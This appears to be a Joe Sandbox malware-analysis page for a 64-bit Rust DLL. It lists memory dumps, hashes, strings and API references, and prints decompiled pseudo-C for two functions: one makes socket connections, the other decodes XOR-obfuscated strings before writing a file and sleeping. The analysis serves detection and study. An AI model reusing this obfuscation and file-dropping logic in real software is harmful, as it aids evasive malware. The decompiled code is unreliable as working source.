called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF304FDF7, 000007FEF30501DA, 000007FEF3050BE9, 000007FEF305103C
\"Certificate, xrefs: 000007FEF304FEF3, 000007FEF3050D76
aead::Error, xrefs: 000007FEF30511CA

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: \"Certificate$aead::Error$attempt to join into collection with len > usize::MAX/rustc/7eef946fc0e0eff40e588eab77b09b287accbec3\library\alloc\src\str.rs$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 0-3989447723
Opcode ID: c9207abd5b9bed0549e646d810180696ce71d762c1fc8d5fbe6b2a1234e4a3b8
Instruction ID: 97dea4edaa525119e6f0e303d270967fe4a18a85be68ab154cbbd75441d0c64f
Opcode Fuzzy Hash: c9207abd5b9bed0549e646d810180696ce71d762c1fc8d5fbe6b2a1234e4a3b8
Instruction Fuzzy Hash: 43E28276A08B8189E6A4DB12E4443BA63E2F789BC4F448133DE8D57BA9DF3CD545E700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30BB7C0 Relevance: 51.6, APIs: 24, Strings: 5, Instructions: 880
memorynetworkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E000007FE7FEF30BB7C0() {
				void* _t202;
				void* _t206;
				void* _t214;
				void* _t222;
				void* _t223;
				void* _t230;
				void* _t234;
				void* _t237;
				void* _t238;
				void* _t242;
				void* _t245;
				void* _t246;
				intOrPtr _t249;
				void* _t251;
				long long _t272;
				long long* _t282;
				long long _t291;
				intOrPtr _t293;
				signed long long _t294;
				void* _t298;
				void* _t300;
				signed long long _t302;
				long long _t308;
				long long _t309;
				signed int* _t317;
				long long _t322;
				long long _t331;
				intOrPtr* _t342;
				long long* _t343;
				long long _t347;
				long long* _t353;
				void* _t360;
				intOrPtr _t368;
				void* _t369;
				void* _t381;
				void* _t382;
				long long _t383;
				long long _t394;
				long long _t397;
				void* _t401;
				signed short* _t403;
				long long _t408;

				_t381 = _t382 + 0x80;
				asm("movaps [ebp+0x510], xmm6");
				 *((long long*)(_t381 + 0x508)) = 0xfffffffe;
				_t408 = _t342;
				 *((long long*)(_t381 + 0x458)) = _t383;
				 *((long long*)(_t381 + 0x460)) = _t394;
				_t368 =  *_t342;
				_t230 =  *(_t368 + 0x68);
				_t245 = _t230 - 0x3b9aca00;
				if (_t245 != 0) goto 0xf30bb82c;
				_t272 =  *((intOrPtr*)(_t408 + 0x98));
				 *((long long*)(_t381 + 0x488)) = _t272;
				 *((intOrPtr*)(_t381 + 0x4dc)) =  *((intOrPtr*)(_t408 + 0xa0));
				goto 0xf30bb884;
				E000007FE7FEF30A3B10(_t214, _t237, _t342);
				 *((intOrPtr*)(_t381 + 0x4dc)) = 0x3b9aca00;
				 *((long long*)(_t381 + 0x488)) = _t272 +  *((intOrPtr*)(_t368 + 0x60));
				if (_t245 >= 0) goto 0xf30bb84d;
				goto 0xf30bb884;
				_t223 = _t222 + _t230;
				_t246 = _t223 - 0x3b9ac9ff;
				if (_t246 <= 0) goto 0xf30bb866;
				 *((long long*)(_t381 + 0x488)) =  *((long long*)(_t381 + 0x488)) + 1;
				if (_t246 == 0) goto 0xf30bb884;
				 *((intOrPtr*)(_t381 + 0x4dc)) = _t223 + 0xc4653600 - (_t223 + 0xc4653600 >> 9) * 0x3b9aca00;
				if ( *((char*)(_t368 + 0x5c)) != 4) goto 0xf30bb910;
				 *((char*)(_t381 + 0x414)) = 4;
				_t309 = _t381 - 0x50;
				 *_t309 = _t381 + 0x458;
				 *((long long*)(_t309 + 8)) = 0x7fef3096a50;
				 *((long long*)(_t309 + 0x10)) = _t381 + 0x590;
				 *((long long*)(_t309 + 0x18)) = 0x7fef3058eb0;
				_t343 = _t381 + 0x1c0;
				 *_t343 = 0xf314bb18;
				 *((long long*)(_t343 + 8)) = 0xf314bb18;
				 *((long long*)(_t343 + 0x10)) = 0;
				 *((long long*)(_t343 + 0x20)) = _t309;
				 *((long long*)(_t343 + 0x28)) = 0xf314bb18;
				_t369 = _t381 + 0x418;
				E000007FE7FEF3051840(_t369, _t343);
				asm("movups xmm0, [esi]");
				asm("movaps [ebp+0x470], xmm0");
				goto 0xf30bba37;
				E000007FE7FEF3051C30( *((intOrPtr*)(_t369 + 0x10)), _t381 + 0x4c0,  *((intOrPtr*)(_t369 + 0x10)),  *((intOrPtr*)(_t369 + 0x20)));
				r14d =  *(_t369 + 0x58);
				if ( *((intOrPtr*)(_t369 + 0x28)) == 0) goto 0xf30bb943;
				E000007FE7FEF3051C30( *((intOrPtr*)(_t369 + 0x10)), _t381 + 0x418,  *((intOrPtr*)(_t369 + 0x28)),  *((intOrPtr*)(_t369 + 0x38)));
				goto 0xf30bb94e;
				 *((long long*)(_t381 + 0x418)) = 0;
				_t249 =  *((intOrPtr*)(_t369 + 0x40));
				if (_t249 == 0) goto 0xf30bb966;
				E000007FE7FEF3051C30( *((intOrPtr*)(_t369 + 0x10)), _t381 - 0x50,  *((intOrPtr*)(_t369 + 0x40)),  *((intOrPtr*)(_t369 + 0x50)));
				goto 0xf30bb96e;
				 *((long long*)(_t381 - 0x50)) = 0;
				r8b =  *(_t369 + 0x5c);
				_t282 = _t381 + 0x1c0;
				 *((long long*)(_t282 + 0x10)) =  *((intOrPtr*)(_t381 + 0x4d0));
				asm("movups xmm0, [ebp+0x4c0]");
				asm("movaps [eax], xmm0");
				_t298 = _t381 + 0x418;
				asm("movups xmm0, [ebx]");
				asm("movups [eax+0x18], xmm0");
				 *((long long*)(_t282 + 0x28)) =  *((intOrPtr*)(_t298 + 0x10));
				_t347 = _t381 - 0x50;
				asm("movups xmm0, [edx]");
				asm("movaps [eax+0x30], xmm0");
				 *((long long*)(_t282 + 0x40)) =  *(_t347 + 0x10);
				memcpy(_t230, _t237, 9);
				_t317 = _t381 + 0x410;
				 *_t317 = r14d;
				_t317[1] = r8b;
				 *_t347 = _t381 + 0x3c8;
				 *((long long*)(_t347 + 8)) = 0x7fef3051250;
				 *(_t347 + 0x10) = _t317;
				 *((long long*)(_t347 + 0x18)) = 0x7fef30555b0;
				 *_t282 = 0xf314bb18;
				 *((long long*)(_t282 + 8)) = 0xf314bb18;
				 *((long long*)(_t282 + 0x10)) = 0;
				 *((long long*)(_t282 + 0x20)) = _t347;
				 *((long long*)(_t282 + 0x28)) = 0xf314bb18;
				E000007FE7FEF3051840(_t298, _t381 + 0x1c0);
				asm("movups xmm0, [ebx]");
				asm("movaps [ebp+0x470], xmm0");
				 *((long long*)(_t381 + 0x480)) =  *((intOrPtr*)(_t298 + 0x10));
				asm("lock dec eax");
				if (_t249 <= 0) goto 0xf30bc954;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t408 + 8)) + 0x88)) + 0x20))();
				 *((long long*)(_t381 + 0x4e8)) = _t408;
				if ( *((long long*)(_t381 + 0x4c0)) == 0) goto 0xf30bbaac;
				 *((long long*)(_t381 - 0x40)) =  *((intOrPtr*)(_t381 + 0x4d0));
				asm("movups xmm0, [ebp+0x4c0]");
				asm("movaps [ebp-0x50], xmm0");
				goto 0xf30bbb55;
				_t322 = _t381 + 0x448;
				 *_t322 = _t381 + 0x470;
				 *((long long*)(_t322 + 8)) = 0x7fef3051250;
				_t353 = _t381 + 0x418;
				 *_t353 = 0xf314c5b8;
				r15d = 2;
				 *((long long*)(_t353 + 8)) = _t408;
				r12d = 0;
				 *((long long*)(_t353 + 0x10)) = _t397;
				 *((long long*)(_t353 + 0x20)) = _t322;
				 *((long long*)(_t353 + 0x28)) = 1;
				_t300 = _t381 + 0x1c0;
				E000007FE7FEF3051840(_t300, _t353);
				 *(_t300 + 0x44) = 2;
				 *((long long*)(_t300 + 0x70)) = _t397;
				 *((char*)(_t300 + 0x80)) = 2;
				 *((long long*)(_t300 + 0xc8)) = _t408;
				_t401 = _t381 - 0x50;
				E000007FE7FEF30B111D(_t237 + 0x12, _t237, _t242 + 0xc, 0xf314c5b8, _t401, _t300,  *((intOrPtr*)(_t381 + 0x4c8)));
				_t251 =  *((intOrPtr*)(_t401 + 0xc8)) - 3;
				if (_t251 != 0) goto 0xf30bc399;
				 *((long long*)(_t381 + 0x4a8)) =  *((intOrPtr*)(_t381 - 0x50));
				 *((long long*)(_t381 + 0x490)) =  *((intOrPtr*)(_t381 - 0x48));
				_t302 =  *((intOrPtr*)(_t381 - 0x40));
				asm("lock dec eax");
				if (_t251 != 0) goto 0xf30bbb80;
				E000007FE7FEF30760FA();
				if (_t302 == 0) goto 0xf30bc24d;
				 *((long long*)(_t381 + 0x498)) = _t308;
				 *(_t381 + 0x507) =  *((intOrPtr*)(_t381 + 0x414));
				_t291 = _t381 + 0x448;
				 *_t291 = 0;
				_t403 =  *((intOrPtr*)(_t381 + 0x4a8));
				 *((long long*)(_t381 + 0x4b0)) = _t403 + (_t302 << 5);
				_t238 =  *_t403 & 0x0000ffff;
				 *((long long*)(_t381 + 0x4a0)) = 0xffffffff;
				if (_t238 == 2) goto 0xf30bc2de;
				 *((long long*)(_t381 + 0x4e0)) = _t291;
				r15d = _t403[4];
				r12d = _t403[6] & 0x0000ffff;
				asm("inc ecx");
				r14d = _t403[3] & 0x0000ffff;
				if ( *((intOrPtr*)(_t381 + 0x4dc)) == 0x3b9aca00) goto 0xf30bbc44;
				r8d =  *((intOrPtr*)(_t381 + 0x4dc));
				E000007FE7FEF30A8460(2, _t223 + 0xc4653600 - (_t223 + 0xc4653600 >> 9) * 0x3b9aca00, _t238,  *((intOrPtr*)(_t381 + 0x4dc)) - 0x3b9aca00, _t291, _t381 + 0x1c0,  *((intOrPtr*)(_t381 + 0x488)));
				_t234 =  *(_t381 + 0x1c8);
				if (_t234 == 0x3b9aca00) goto 0xf30bc496;
				 *((long long*)(_t381 + 0x468)) =  *(_t381 + 0x1c0);
				if (( *(_t381 + 0x507) & 0x00000003) != 0) goto 0xf30bbc93;
				if (_t234 != 0x3b9aca00) goto 0xf30bbcf7;
				 *(_t381 + 0x1c0) = r15d;
				 *(_t381 + 0x1c4) = r12w;
				asm("movups [ebp+0x1c6], xmm6");
				if (_t238 != 3) goto 0xf30bbd40;
				goto 0xf30bbd34;
				if ( *((char*)(_t381 + 0x414)) == 4) goto 0xf30bc93a;
				E000007FE7FEF3051C30( *(_t381 + 0x1c0), _t381 + 0x4c0,  *((intOrPtr*)(_t381 + 0x3c8)),  *((intOrPtr*)(_t381 + 0x3d8)));
				r14d =  *(_t381 + 0x410);
				if ( *((intOrPtr*)(_t381 + 0x3e0)) == 0) goto 0xf30bbdbc;
				E000007FE7FEF3051C30( *(_t381 + 0x1c0), _t381 + 0x418,  *((intOrPtr*)(_t381 + 0x3e0)),  *((intOrPtr*)(_t381 + 0x3f0)));
				goto 0xf30bbdc7;
				 *(_t381 + 0x4f0) = r15d;
				_t293 =  *0xf319cf28; // 0x3
				if (_t293 != 3) goto 0xf30bc01b;
				E000007FE7FEF30A2F00(_t238, _t293, _t381 + 0x1c0); // executed
				if ( *(_t381 + 0x1c0) == 0) goto 0xf30bbd7c;
				goto 0xf30bc212;
				_t294 =  *0xf319cf28; // 0x3
				if (_t294 != 3) goto 0xf30bc124;
				_t331 = _t381 + 0x1c0;
				_t202 = E000007FE7FEF30A2F00(_t238, _t294, _t331);
				if ( *(_t381 + 0x1c0) == 0) goto 0xf30bbe85;
				goto 0xf30bc001;
				 *(_t381 + 0x1c0) = 1;
				 *((long long*)(_t381 + 0x4f8)) = _t331;
				__imp__ioctlsocket(); // executed
				if (_t202 == 0xffffffff) goto 0xf30bbe9d;
				if (_t238 == 0) goto 0xf30bbec0;
				r8d = 0x1c;
				goto 0xf30bbed0;
				 *((long long*)(_t381 + 0x418)) = 0;
				if ( *((intOrPtr*)(_t381 + 0x3f8)) == 0) goto 0xf30bbde4;
				E000007FE7FEF3051C30(_t294,  *(_t381 + 0x1c8),  *((intOrPtr*)(_t381 + 0x3f8)),  *((intOrPtr*)(_t381 + 0x408)));
				goto 0xf30bbdef;
				 *(_t381 + 0x1c0) = 0;
				asm("movups xmm0, [ebp+0x4c0]");
				asm("movaps [ebp-0x50], xmm0");
				 *((long long*)(_t381 - 0x40)) =  *((intOrPtr*)(_t381 + 0x4d0));
				_t360 = _t381 - 0x38;
				 *((long long*)(_t360 + 0x10)) =  *((intOrPtr*)(_t381 + 0x428));
				asm("movups xmm0, [ebp+0x418]");
				asm("movups [edx], xmm0");
				 *((long long*)(_t360 + 0x28)) =  *((intOrPtr*)(_t381 + 0x1d0));
				 *((long long*)(_t360 + 0x18)) =  *(_t381 + 0x1c0);
				 *((long long*)(_t360 + 0x20)) =  *(_t381 + 0x1c8);
				_t206 = memcpy(_t234, _t238, 9);
				 *(_t381 + 0x208) = r14d;
				 *(_t381 + 0x20c) = _t206;
				r8d = 0x17;
				E000007FE7FEF3073FEC(0x27, _t294, "SOCKS feature disabled.unknown scheme \'",  *((intOrPtr*)(_t381 + 0x408)));
				E000007FE7FEF30A7F10( *(_t381 + 0x1c8));
				goto 0xf30bc212;
				if (_t238 == 0) goto 0xf30bbf97;
				r8d = 0x1c;
				goto 0xf30bbfa7;
				__imp__WSAGetLastError();
				goto 0xf30bc209;
				asm("xorps xmm6, xmm6");
				r8d = 0x10;
				r12d = r14d;
				asm("inc cx");
				 *(_t381 + 0x1c0) = 2;
				 *(_t381 + 0x1c2) = r12w;
				 *(_t381 + 0x1c4) = _t403[1];
				asm("movups [ebp+0x1c8], xmm6");
				 *(_t381 + 0x1d8) =  *(_t381 + 0x4f0);
				__imp__connect(); // executed
				if (2 == 0xffffffff) goto 0xf30bbf20;
				goto 0xf30bbf30;
				__imp__WSAGetLastError();
				 *(_t381 + 0x1c0) = 0;
				__imp__ioctlsocket(); // executed
				if (2 == 0xffffffff) goto 0xf30bbf7d;
				if (((_t294 << 0x00000020 | 0x00000002) << 0x00000020 | 0x00000002) == 0) goto 0xf30bc64f;
				goto __rax;
			}

0x7fef30bb7d3
0x7fef30bb7db
0x7fef30bb7e2
0x7fef30bb7ed
0x7fef30bb7f3
0x7fef30bb7fa
0x7fef30bb801
0x7fef30bb804
0x7fef30bb807
0x7fef30bb80d
0x7fef30bb80f
0x7fef30bb816
0x7fef30bb824
0x7fef30bb82a
0x7fef30bb830
0x7fef30bb835
0x7fef30bb842
0x7fef30bb849
0x7fef30bb84b
0x7fef30bb84d
0x7fef30bb84f
0x7fef30bb855
0x7fef30bb857
0x7fef30bb85e
0x7fef30bb87e
0x7fef30bb888
0x7fef30bb88e
0x7fef30bb89c
0x7fef30bb8a0
0x7fef30bb8aa
0x7fef30bb8b5
0x7fef30bb8c0
0x7fef30bb8cb
0x7fef30bb8d2
0x7fef30bb8da
0x7fef30bb8de
0x7fef30bb8e6
0x7fef30bb8ea
0x7fef30bb8ee
0x7fef30bb8f8
0x7fef30bb8fd
0x7fef30bb900
0x7fef30bb90b
0x7fef30bb91f
0x7fef30bb924
0x7fef30bb92f
0x7fef30bb93c
0x7fef30bb941
0x7fef30bb943
0x7fef30bb952
0x7fef30bb955
0x7fef30bb95f
0x7fef30bb964
0x7fef30bb966
0x7fef30bb96e
0x7fef30bb979
0x7fef30bb980
0x7fef30bb984
0x7fef30bb98b
0x7fef30bb98e
0x7fef30bb995
0x7fef30bb998
0x7fef30bb9a0
0x7fef30bb9a4
0x7fef30bb9a8
0x7fef30bb9ab
0x7fef30bb9b3
0x7fef30bb9c9
0x7fef30bb9cc
0x7fef30bb9d3
0x7fef30bb9d6
0x7fef30bb9da
0x7fef30bb9e4
0x7fef30bb9e8
0x7fef30bb9f3
0x7fef30bb9fe
0x7fef30bba06
0x7fef30bba0a
0x7fef30bba12
0x7fef30bba16
0x7fef30bba24
0x7fef30bba29
0x7fef30bba2c
0x7fef30bba37
0x7fef30bba49
0x7fef30bba4d
0x7fef30bba81
0x7fef30bba88
0x7fef30bba8f
0x7fef30bba98
0x7fef30bba9c
0x7fef30bbaa3
0x7fef30bbaa7
0x7fef30bbaba
0x7fef30bbac1
0x7fef30bbacb
0x7fef30bbad6
0x7fef30bbadd
0x7fef30bbae0
0x7fef30bbae6
0x7fef30bbaea
0x7fef30bbaed
0x7fef30bbaf1
0x7fef30bbaf5
0x7fef30bbafd
0x7fef30bbb07
0x7fef30bbb0c
0x7fef30bbb13
0x7fef30bbb17
0x7fef30bbb1e
0x7fef30bbb28
0x7fef30bbb35
0x7fef30bbb4b
0x7fef30bbb4f
0x7fef30bbb59
0x7fef30bbb64
0x7fef30bbb6b
0x7fef30bbb6f
0x7fef30bbb73
0x7fef30bbb7b
0x7fef30bbb83
0x7fef30bbb89
0x7fef30bbb96
0x7fef30bbb9c
0x7fef30bbba3
0x7fef30bbbae
0x7fef30bbbba
0x7fef30bbbc1
0x7fef30bbbc6
0x7fef30bbbd5
0x7fef30bbbdb
0x7fef30bbbe2
0x7fef30bbbe6
0x7fef30bbbeb
0x7fef30bbbf4
0x7fef30bbc08
0x7fef30bbc18
0x7fef30bbc1f
0x7fef30bbc24
0x7fef30bbc30
0x7fef30bbc3d
0x7fef30bbc4b
0x7fef30bbc61
0x7fef30bbc67
0x7fef30bbc6e
0x7fef30bbc76
0x7fef30bbc81
0x7fef30bbc8e
0x7fef30bbc9a
0x7fef30bbcb5
0x7fef30bbcba
0x7fef30bbcd9
0x7fef30bbced
0x7fef30bbcf2
0x7fef30bbcf7
0x7fef30bbcfe
0x7fef30bbd09
0x7fef30bbd1b
0x7fef30bbd2f
0x7fef30bbd3b
0x7fef30bbd40
0x7fef30bbd4b
0x7fef30bbd51
0x7fef30bbd5a
0x7fef30bbd6e
0x7fef30bbd77
0x7fef30bbd7c
0x7fef30bbd86
0x7fef30bbd95
0x7fef30bbd9e
0x7fef30bbda7
0x7fef30bbdad
0x7fef30bbdb7
0x7fef30bbdbc
0x7fef30bbdd1
0x7fef30bbddd
0x7fef30bbde2
0x7fef30bbde4
0x7fef30bbdf5
0x7fef30bbdfc
0x7fef30bbe07
0x7fef30bbe12
0x7fef30bbe16
0x7fef30bbe1a
0x7fef30bbe21
0x7fef30bbe2b
0x7fef30bbe36
0x7fef30bbe41
0x7fef30bbe51
0x7fef30bbe54
0x7fef30bbe5b
0x7fef30bbe61
0x7fef30bbe70
0x7fef30bbe7b
0x7fef30bbe80
0x7fef30bbe88
0x7fef30bbe8e
0x7fef30bbe98
0x7fef30bbe9d
0x7fef30bbebb
0x7fef30bbec0
0x7fef30bbec3
0x7fef30bbecd
0x7fef30bbedd
0x7fef30bbee2
0x7fef30bbee9
0x7fef30bbef1
0x7fef30bbef7
0x7fef30bbefe
0x7fef30bbf11
0x7fef30bbf1a
0x7fef30bbf1e
0x7fef30bbf20
0x7fef30bbf37
0x7fef30bbf4c
0x7fef30bbf55
0x7fef30bbf5a
0x7fef30bbf73

APIs

connect.WS2_32 ref: 000007FEF30BBFD9
WSAGetLastError.WS2_32 ref: 000007FEF30BBFE8
closesocket.WS2_32 ref: 000007FEF30BBFFB
HeapFree.KERNEL32 ref: 000007FEF30BC2D3
HeapFree.KERNEL32 ref: 000007FEF30BC2FB
setsockopt.WS2_32 ref: 000007FEF30BC347
closesocket.WS2_32 ref: 000007FEF30BC5E8
HeapFree.KERNEL32 ref: 000007FEF30BC619

Strings

shouldn't happen: failed to connect to all IPs, but no error, xrefs: 000007FEF30BC958
SOCKS feature disabled.unknown scheme ', xrefs: 000007FEF30BBE69
Connect , xrefs: 000007FEF30BC423
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30BC93A
ct error, xrefs: 000007FEF30BC430

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap$closesocket$ErrorLastconnectsetsockopt
String ID: Connect $SOCKS feature disabled.unknown scheme '$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$ct error$shouldn't happen: failed to connect to all IPs, but no error
API String ID: 2111364814-3233874117
Opcode ID: c76e73759b741607427bc7b10f897674eefa3ac989155f1bd1f9660ee9d3cd02
Instruction ID: 4d5dda2fb36b8f674764d613d2bfa66b08101696fcbc69538243f9bb46e8f459
Opcode Fuzzy Hash: c76e73759b741607427bc7b10f897674eefa3ac989155f1bd1f9660ee9d3cd02
Instruction Fuzzy Hash: F1A26EB2A05BC289E7B0CF25D8507ED33A6F748B88F444126CA4D5BBA9DF38D695D304

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF304DFF4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 421
memoryfileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 24%

			E000007FE7FEF304DFF4(void* __edi, void* __esi, signed int __rax, long long __rcx, long long __rdx) {
				void* _t127;
				int _t133;
				void* _t225;
				void* _t228;
				signed long long* _t251;
				signed long long* _t253;
				intOrPtr _t254;
				signed long long* _t257;
				intOrPtr* _t261;
				intOrPtr* _t265;
				intOrPtr _t266;
				long long* _t269;
				signed long long _t285;
				intOrPtr _t293;
				intOrPtr _t294;
				intOrPtr _t302;
				signed long long _t305;
				signed long long _t306;
				intOrPtr _t307;
				long long _t325;
				void* _t326;
				long long _t327;
				void* _t328;
				signed long long _t332;
				long long _t335;
				signed long long _t337;
				intOrPtr _t343;
				intOrPtr _t344;
				signed long long _t349;
				intOrPtr* _t358;
				intOrPtr _t359;
				intOrPtr* _t360;
				intOrPtr _t361;
				intOrPtr* _t362;
				intOrPtr* _t364;
				intOrPtr _t365;
				long long _t368;
				signed long long _t369;
				long long _t370;
				long long _t371;
				void* _t374;
				intOrPtr _t375;
				long long _t402;
				long long _t409;
				signed long long _t410;
				signed long long _t412;

				 *((long long*)(_t374 + 0xd0)) = __rdx;
				_t409 = __rcx;
				_t325 =  *0xf319c078; // 0x3356b0
				_t375 =  *0xf319c088; // 0xa
				_t358 = _t374 + 0x98;
				E000007FE7FEF30515F0(__rax, _t358, _t325, _t375);
				_t365 =  *_t358;
				_t343 =  *((intOrPtr*)(_t358 + 8));
				_t264 =  ==  ? _t343 : _t365;
				_t402 =  *((intOrPtr*)(_t358 + 0x10));
				E000007FE7FEF30694DF(0, __rax, _t402);
				_t326 =  ==  ? _t343 : _t365;
				E000007FE7FEF30F1E10();
				if (_t365 == 0) goto 0xf304e07f;
				if (_t343 == 0) goto 0xf304e07f;
				HeapFree(??, ??, ??);
				_t327 =  *_t409;
				 *((long long*)(_t374 + 0x90)) = _t409;
				_t265 = _t374 + 0x98;
				E000007FE7FEF30515F0(__rax, _t265, _t327,  *((intOrPtr*)(_t409 + 0x10)));
				_t344 =  *_t265;
				_t359 =  *((intOrPtr*)(_t265 + 8));
				_t367 =  ==  ? _t359 : _t344;
				_t266 =  *((intOrPtr*)(_t265 + 0x10));
				E000007FE7FEF30694DF(0, __rax, _t266);
				 *((long long*)(_t374 + 0x88)) = _t327;
				 *((long long*)(_t374 + 0x40)) = __rax;
				_t328 =  ==  ? _t359 : _t344;
				E000007FE7FEF30F1E10();
				if (_t344 == 0) goto 0xf304e0f4;
				if (_t359 == 0) goto 0xf304e0f4;
				HeapFree(??, ??, ??);
				_t410 = _t374 + 0x98;
				E000007FE7FEF3051C30(__rax, _t410,  *((intOrPtr*)(_t374 + 0x40)), _t266);
				 *((long long*)(_t410 + 0x18)) = __rax;
				 *((long long*)(_t410 + 0x20)) = _t325;
				 *((long long*)(_t410 + 0x28)) = _t402;
				 *((long long*)(_t374 + 0x20)) = 0;
				_t360 = _t374 + 0xd8;
				r8d = 2;
				E000007FE7FEF3075B28();
				_t285 = _t410;
				E000007FE7FEF3042B21(_t285);
				_t361 =  *((intOrPtr*)(_t360 + 0x10));
				 *_t410 = 0xf30f42b8;
				_t251 =  *_t410;
				r15d = 0xffff;
				_t332 = (_t410 << 0x00000020 | _t285 +  *0xf319c2f0) << 0x1 & __rax;
				E000007FE7FEF30694DF(0, _t251, _t285 +  *0xf319c2f0);
				 *(_t374 + 0x80) = _t332;
				 *_t251 = 0xe3dfcffb ^  *(_t251 + _t332);
				_t251[1] =  *(_t251 + _t332 + 8) & 0x0000ffff ^ 0x00001249;
				_t251[1] =  *(_t251 + _t332 + 0xa) & 0x000000ff ^ 0x0000007a;
				 *_t410 = 0xf30fa4e7;
				_t253 =  *_t410;
				asm("dec eax");
				E000007FE7FEF30694DF(0, _t253, ((0xb6b80f0b ^  *0xf319c2f8) + 0xbe2a29f5 ^ 0x19a06bd8) + 0xafb875f5 & __rax);
				 *(_t374 + 0x78) = _t332;
				 *_t253 = 0x8055a104 ^ _t253[0xfffffffff6d701e2];
				_t253[1] = _t253[0xfffffffff6d701e3] & 0x0000ffff ^ 0x00006f58;
				_t253[1] = _t253[0xfffffffff6d701e3] & 0x000000ff ^ 0x000000f1;
				_t293 =  *0xf319ce70; // 0x77620000
				r8d = 0xb;
				 *(_t374 + 0x70) = _t251;
				E000007FE7FEF304BE45(_t293, _t251, _t266);
				_t294 =  *0xf319ce70; // 0x77620000
				r8d = 0xb;
				E000007FE7FEF304BE45(_t294, _t253, _t266);
				 *(_t374 + 0xc8) = _t253;
				_t368 =  *0xf319c1f0; // 0x24
				if (_t361 == 0) goto 0xf304e2ca;
				_t225 = _t368 -  *0xf319c1e8; // 0x40
				if (_t225 != 0) goto 0xf304e2a6;
				_t335 = _t368;
				_t127 = E000007FE7FEF3043262(_t335);
				_t369 =  *0xf319c1f0; // 0x24
				_t254 =  *0xf319c1e0; // 0x35c9c0
				 *((short*)(_t254 + _t369 * 2)) =  *( *_t360 + _t266) & 0x000000ff;
				_t370 =  *0xf319c1f0; // 0x24
				_t371 = _t370 + 1;
				 *0xf319c1f0 = _t371;
				if (_t361 != _t266 + 1) goto 0xf304e285;
				E000007FE7FEF30C6C2A(_t127, _t371);
				_t349 = _t374 + 0xf0;
				 *_t349 = _t254;
				 *((long long*)(_t349 + 8)) = _t335;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t349 + 0x10)) = _t371;
				_t269 = _t374 + 0x98;
				_t337 = _t349;
				E000007FE7FEF30410D8(_t269, _t337);
				if ( *_t269 != 0) goto 0xf304e6f4;
				 *((long long*)(_t374 + 0x30)) = 0;
				 *((intOrPtr*)(_t374 + 0x28)) = 0;
				 *((intOrPtr*)(_t374 + 0x20)) = 2;
				r8d = 0;
				r9d = 0;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				_t228 = _t254 - 0xffffffff;
				_t362 =  *((intOrPtr*)(_t374 + 0xd0));
				if (_t228 == 0) goto 0xf304e5f8;
				 *((long long*)(_t374 + 0x60)) =  *((intOrPtr*)(_t374 + 0xa0));
				 *((long long*)(_t374 + 0x68)) =  *((intOrPtr*)(_t374 + 0xa8));
				 *((intOrPtr*)(_t374 + 0xf0)) = 0;
				_t412 =  *_t362;
				 *((long long*)(_t374 + 0x58)) =  *((intOrPtr*)(_t362 + 8));
				 *((long long*)(_t374 + 0x98)) = 0xf3101157;
				_t257 =  *((intOrPtr*)(_t374 + 0x98));
				E000007FE7FEF30694DF(0, _t257, 0x9b3e92c5 -  *0xf319c300);
				 *(_t374 + 0x50) = (_t337 << 0x00000020 | 0x9b3e92c5) << 6;
				 *_t257 = 0xa1500ec1 ^ _t257[0xfffffffff367d259];
				_t257[1] = _t257[0xfffffffff367d25a] ^ 0x00000084;
				_t302 =  *0xf319ce70; // 0x77620000
				r8d = 9;
				E000007FE7FEF304BE45(_t302, _t257, _t371 + _t371);
				if (_t228 != 0) goto 0xf304e731;
				 *((long long*)(_t374 + 0x20)) = 0;
				 *(_t374 + 0x48) = _t412;
				r8d = r12d; // executed
				_t133 = WriteFile(??, ??, ??, ??, ??); // executed
				 *(_t374 + 0xc8)();
				if (_t133 == 0) goto 0xf304e5b8;
				 *((long long*)(_t374 + 0x98)) = 0xf30fe6d1;
				_t261 =  *((intOrPtr*)(_t374 + 0x98));
				_t305 =  *0xf319c308; // 0x86fcd8473d5a74fb
				asm("dec eax");
				_t306 = _t305 * 0x7faf98ec;
				E000007FE7FEF30694DF(0, _t261, _t306);
				 *(_t261 + 4) =  *(_t261 + _t306 + 4) ^ 0x00000033;
				 *_t261 = 0xae4febc8;
				_t307 =  *0xf319ce70; // 0x77620000
				r8d = 5;
				E000007FE7FEF304BE45(_t307, _t261, _t371 + _t371);
				SleepEx(??, ??); // executed
